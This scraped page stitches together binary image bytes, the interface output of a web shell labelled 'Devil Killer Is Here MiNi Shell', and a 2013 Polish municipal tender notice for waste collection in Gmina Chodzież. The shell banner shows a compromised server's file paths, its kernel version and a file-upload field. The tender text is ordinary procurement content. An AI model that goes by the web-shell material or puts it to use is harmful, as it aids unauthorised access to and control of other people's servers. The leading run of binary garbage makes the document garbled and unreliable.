JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130516/191592-N-2013.html

<p class="kh_header"><b>Chodzież: Odbieranie i zagospodarowanie odpadów komunalnych od mieszkańców  Gminy Chodzież</b><br>
<b>Numer ogłoszenia: 191592 - 2013; data zamieszczenia: 16.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Chodzież , ul. Notecka 28, 64-800 Chodzież, woj. wielkopolskie, tel. (67) 2821-608, faks (67) 2821-608.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminachodziez.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbieranie i zagospodarowanie odpadów komunalnych od mieszkańców  Gminy Chodzież.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1	Przedmiotem zamówienia jest  świadczenie usług polegających na odbiorze i zagospodarowaniu   odpadów komunalnych gromadzonych na terenie nieruchomości zamieszkałych z   terenu  gminy Chodzież, z wyłączeniem odpadów związanych z prowadzeniem działalności gospodarczej.  zagospodarowanie odpadów odebranych z nieruchomości zamieszkałych  o których mowa  w ppkt 3)  wykonawca zobowiązany jest do przekazania . Zmieszanych odpadów komunalnych     z terenu gminy Chodzież   do instalacji regionalnej wpisanej w  Wojewódzki Plan Gospodarki Odpadami na lata 2012 2017  . Selektywnie zebrane odpady komunalne wykonawca zagospodaruje we własnym zakresie przekazując je do instalacji odzysku i unieszkodliwiania zgodnie z hierarchią postępowania  z odpadami określoną w obowiązujących przepisach prawa. ( art. 17 ustawy z dnia 14 grudnia 2012 o odpadach ( Dz.U. z 2013 r. poz.21)
Odbiór odpadów zbieranych selektywnie oraz ich transport należy prowadzić w taki sposób by nie dopuścić do zmieszania tych odpadów tj. poszczególnych frakcji zbieranych selektywnie.Zbiórka odpadów komunalnych odbywać się będzie z podziałem na odpady niesegregowane zmieszane (kod odpadu 20 03 01), odpady opakowaniowe z metali, tworzyw sztucznych oraz odpady opakowaniowe wielomateriałowe (kody 150101, 150102, 150104, 150105, 150106, ), odpady segregowane - szkło (kod 150107, 200102) odpady segregowane  papier i tektura  (kod 150101, 200101 ) odpady zielone (kod 200201, 200108) odpady komunalne obejmujące   chemikalia (np. farby, lakiery, środki ochrony roślin), zużyte akumulatory, ogniwa i baterie, opony, meble i inne odpady wielkogabarytowe kody 200127, 200128, 200133,  , 200129, 200130, 200307, 160103 ) odpady budowlane i rozbiórkowe pochodzące z drobnych prac remontowych na które nie są wymagane decyzje organu budowlanego np. pozwolenia na budowę lub forma zgłoszenia prac budowlanych        (kod 170101, 170102, 170103, 170504, 170107, 170180, 170201)Zbiórka odpadów komunalnych  z posesji zamieszkałych jednorodzinnych,                           
Na terenie zabudowy jednorodzinnej obowiązywać będzie system mieszany workowo pojemnikowy zbiórki odpadów komunalnych.a) niesegregowane (zmieszane) odpady komunalne Niesegregowane (zmieszane) odpady komunalne gromadzone będą  w pojemnikach.Częstotliwość załadunku i wywozu 1 raz na dwa tygodnie.b) selektywnie zbierane odpady komunalne Selektywna zbiórka odpadów opakowaniowych z metali, tworzyw sztucznych oraz odpadów 	opakowaniowych wielomateriałowych  na terenie zabudowy jednorodzinnej będzie się odbywać w systemie workowym bądź pojemnikowym .Częstotliwość załadunku i wywozu 1 raz w miesiącu c) odpady zielone i biodegradowalne.Odpady zielone gromadzone będą w pojemnikach lub workach.
Zamawiający przewiduje, iż odbiór odpadów zielonych dotyczyć będzie około 10 % nieruchomości zlokalizowanych na terenie gminy, (dane pozyskane z ankietyzacji przeprowadzonej w 2012 r. ).( regulamin utrzymania czystości i porządku w § 2 pkt 3 dopuszcza kompostowanie odpadów zielonych i ulegających biodegradacji na terenie nieruchomości, na której powstały, właściciel nieruchomości składa oświadczenie Zamawiającemu za pośrednictwem   Wykonawcy o ilości odpadów biodegradowalnych . Wzór  Oświadczenia    przekaże  Zamawiający .Częstotliwość załadunku i wywozu  1 raz w miesiącu w okresie od kwietnia  do października d) odpady komunalne obejmujące ,chemikalia (np. farby, lakiery, środki ochrony roślin), zużyte akumulatory, ogniwa i 	baterie, opony, meble i inne odpady wielkogabarytowe.Odbiór odpadów wielkogabarytowych  będzie się  odbywać poprzez opróżnianie ww odpadów z boksów usytuowanych w punkcie gromadzenia odpadów w Kamionce.   Częstotliwość załadunku i wywozu 1 raz   na kwartał e)  odpady budowlane Odpady pochodzące z drobnych prac remontowo  budowlanych, gromadzone będą wyłącznie w boksie w punkcie selektywnego gromadzenia odpadów na terenie Gminy Chodzież w m. Kamionka .Częstotliwość załadunku i wywozu  raz na kwartał Nie dotyczy to odpadów pozyskanych przez mieszkańców w przypadku prac budowlanych oraz   remontów na które, wymagane są decyzje organu budowlanego np. pozwolenia na budowę lub forma zgłoszenia prac budowlanych, wówczas powstałe w wyniku takich prac odpady we własnym zakresie zagospodarowuje firma wykonująca taka usługę. Gospodarka tymi odpadami odbywać się będzie w oparciu o indywidualne umowy cywilno prawne zawierane pomiędzy podmiotami wykonującymi prace remontowo budowlane i właścicielami nieruchomości lub między właścicielami a uprawnionymi do odbioru odpadów przedsiębiorcami.5) Zbiórka odpadów komunalnych z zabudowy wielorodzinnej 1)	niesegregowane (zmieszane) odpady komunalne Niesegregowane (zmieszane) odpady komunalne zbierane będą  do pojemników ustawionych w          
miejscach do tego przeznaczonych  ( altanki śmietnikowe, wyznaczone miejsca na pojemniki.Częstotliwość wywozu Milcz 37, 38,39 ,   Nietuszkowo 18, 19,20,21 , Oleśnica blok nr 8, 9 i 10, Podanin  blok 43  raz w tygodniu  Stróżewo 35 , Strzelce 4   1 pojemnik 1100    raz w tygodniu Spółdzielnia Mieszkaniowa Właścicieli Strzelce
dwa  razy w tygodniu .Bloki 24 i 25 w Podaninie oraz blok 16 w Strzelcach i Pietronki nr 5  jak w zabudowie jednorodzinnej z uwagi na pojemność pojemników ( własne 120  każda rodzina) raz na dwa tygodnie  Stróżewo nr 35, Rataje nr 11  240 l,    Rataje nr  13  pojemnik 1100 l  raz na dwa tygodnie 2)  selektywnie zbierane odpady komunalne. Selektywna zbiórka odpadów opakowaniowych z metali, tworzyw sztucznych oraz odpadów opakowaniowych wielomateriałowych  będzie się odbywać w systemie , pojemnikowym. odpady segregowane   szkło odpady ze szkła  gromadzone będą w pojemnikach, Częstotliwość załadunku i wywozu określona jest w załączniku nr 3.do SIWZ.odpady segregowane papier i tektura Odpady z papieru i tektury   gromadzone będą w pojemnikach, Częstotliwość załadunku i wywozu określona jest w załączniku nr 3do SIWZ. odpady komunalne obejmujące , chemikalia (np. farby, lakiery, środki ochrony roślin),zużyte akumulatory, ogniwa i 	baterie, opony, meble i inne odpady  wielkogabarytowe.Odbiór wyżej wymienionych odpadów z altanek i miejsc gromadzenia odpadów w terminach ustalonych w harmonogramie  ustalonym przez Wykonawcę  w uzgodnieniu z Zamawiającym Częstotliwość załadunku i wywozu 1 raz na kwartał.Koszt wyposażenia nieruchomości  w urządzenia do gromadzenia odpadów  ( pojemniki i worki ponosi wykonawca ujmując je w oferowanej cenie.Odbiór odpadów odbywał się będzie zgodnie  harmonogramem wywozu z terenu gminy Chodzież  sporządzonym przez Wykonawcę w uzgodnieniu z Zamawiającym .Zamawiający dopuszcza opracowanie harmonogramu przed podpisaniem umowy, który to harmonogram stanowić będzie załącznik do umowy.
W harmonogramie należy wyszczególnić nazwę ulicy, rodzaj odpadu i datę odbioru  	odpadów komunalnych.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień  uzupełniających, o których mowa w art. 67 ust. 1 pkt 6  ustawy Prawo zamówień publicznych.Zamawiający udzieli  zamówień w przypadku pojawienia się zapotrzebowania na usługi objęte       przedmiotem zamówienia ponad bieżące zamówienie w okresie objętym umową.
Zamawiający przewiduje udzielenie zamówień na odbiór i zagospodarowanie odpadów  komunalnych niesegregowanych  zmieszanych, opakowaniowych  z metali, tworzyw sztucznych oraz odpadów opakowaniowych  wielomateriałowych,  segregowanych szkło,  segregowanych papier i tektura,  zielonych,  komunalnych  obejmujących   chemikalia (np. farby, lakiery, środki ochrony roślin), zużyte akumulatory, ogniwa i baterie, opony, meble i inne odpady wielkogabarytowe oraz  budowlane  i rozbiórkowe pochodzące z drobnych prac remontowych na które nie są wymagane decyzje organu budowlanego  np. pozwolenia na budowę lub forma zgłoszenia prac budowlanych,Zamówienia uzupełniające stanowić będą nie więcej niż 30  % wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2, 90.51.13.00-5, 90.51.31.00-7, 90.51.20.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca złoży wraz z ofertą dokumenty potwierdzające, że posiada wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień w szczególności, że posiada  wpis do rejestru działalności regulowanej  w zakresie odbierania odpadów komunalnych od właścicieli  nieruchomości  z terenu gminy Chodzież , o którym mowa w  art. 9b  i następnych  z ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach  (tekst jednolity Dz. U. Z 2012r. Nr 391 ze zm.) . Posiada zezwolenie  na   transport  i zbieranie odpadów  wydane przez właściwy organ zgodnie z ustawą o odpadach. W przypadku braku wymaganego zezwolenia na zbieranie odpadów , dopuszcza się skorzystanie z usług   podmiotu posiadającego stosowne zezwolenia i spełniającego warunki udziału w postępowaniu .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże , że  w okresie ostatnich 3 lat przed dniem wszczęcia 	postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie,   posiada wiedzę i doświadczenie w wykonaniu co najmniej 1  głównej usługi 	odpowiadającej swoim rodzajem usłudze stanowiącej przedmiot zamówienia, w zakresie odbioru i zagospodarowania odpadów komunalnych,  w wielkości  co najmniej 1000 ton od  co najmniej 3000 osób,  oraz w czasie świadczenia nie krótszym niż 12 kolejnych miesięcy.  Wykonawca złoży wraz z 	ofertą wykaz usług  z 	załączeniem dokumentów potwierdzających, że usługi te  zostały 	wykonane  lub są wykonywane rzetelnie i należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  w celu realizacji zamówienia musi dysponować pojazdami, spełniającymi wymagania określone w Rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości,  w ilości minimum 5 szt. do odbioru odpadów komunalnych.
minimum 2 szt. pojazdów typu śmieciarka do odbioru odpadów  zmieszanych   z pojemników minimum 2 szt. pojazdów do odbioru odpadów segregowanych minimum 1 samochód bez funkcji kompaktujacej, samochód ciężarowy przystosowany do odbioru odpadów  np. wielkogabarytowych.Wykonawca musi posiadać odpowiednią do przedmiotu zamówienia, bazę magazynowo transportową usytuowaną w na terenie Gminy Chodzież lub w odległości nie większej niż 60 km od granicy Gminy Chodzież
Wyposażoną zgodnie z zapisami Rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości. Czynności związane z bieżącą konserwacją, naprawami, myciem i dezynfekcją pojazdów  mogą być wykonywane przez podmioty zewnętrzne  poza  terenem bazy magazynowo  transportowej 
Dopuszcza się   usytuowanie  części bazy transportowej oraz magazynowej na oddzielnych terenach które spełniać będą warunki określone w Rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości ust. 1,2 i 3 cytowanego wyżej Rozporządzenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować  osobami ( pracownikami) gwarantującymi sprawną realizację przedmiotu zamówienia  zgodnie   z harmonogramem wywozu odpadów  . Zamawiający  nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca  zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. O udzielenie zamówienia mogą ubiegać się wykonawcy , którzy znajdują się w sytuacji ekonomicznej i finansowej  zapewniającej  wykonanie zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmianę dopuszcza się  w przypadku wystąpienia co najmniej jednej z okoliczności  niezależnych od stron umowy , nieznanych stronom umowy w chwili jej zawierania bądź podczas prowadzenia postępowania o udzielenie zamówienia, uniemożliwiającymi lub utrudniającymi świadczenie usług objętych zamówieniem  spowodowanych Warunkami atmosferycznymi odbiegającymi od typowych np. nadmierne opady    atmosferyczne uniemożliwiające dojazd , zdarzenia spowodowane katastrofalnym działaniem przyrody   o charakterze przypadkowym ,zmianą zapisu  Regulaminu utrzymania czystości i porządku na terenie gminy Chodzież zmianą  obowiązujących  przepisów prawa mających  wpływ na realizację  umowy albo zmianę  zasad jej finansowania  i  rozliczania   np. zmiana wysokości podatku VAT;Wszystkie powyższe postanowienia stanowią katalog zmian na które Zamawiający może wyrazić zgodę. Nie stanowią  jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gminachodziez.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Chodzież 64-800 ul. Notecka 28.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2013 godzina 10:00, miejsce: Urząd Gminy w Chodzieży ul. Notecka 28,  64-800 Chodzież w biurze nr 10 (sekretariat),.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





